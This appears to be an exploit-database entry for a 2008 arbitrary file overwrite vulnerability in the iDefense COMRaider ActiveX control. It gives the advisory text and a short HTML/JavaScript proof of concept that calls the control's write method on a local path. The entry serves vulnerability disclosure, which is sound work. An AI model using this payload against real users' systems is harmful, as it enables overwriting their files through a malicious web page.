header-logo
Suggest Exploit
vendor:
COMRaider ActiveX control
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Overwrite
264
CWE
Product Name: COMRaider ActiveX control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

iDefense COMRaider ActiveX control Arbitrary File Overwrite Vulnerability

iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). An attacker can exploit this issue by enticing an unsuspecting user to view a malicious web page.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/33942/info

iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).

<HTML> <BODY> <object id=target classid="clsid:{9A077D0D-B4A6-4EC0-B6CF-98526DF589E4}"></object> <SCRIPT> function Poc() { arg1="c:\boo.txt" target.write(arg1) } </SCRIPT> <input language=JavaScript onclick=Poc() type=button value="Proof of Concept"> </BODY> </HTML>

Navigation

Suggest Exploit

Services By CQR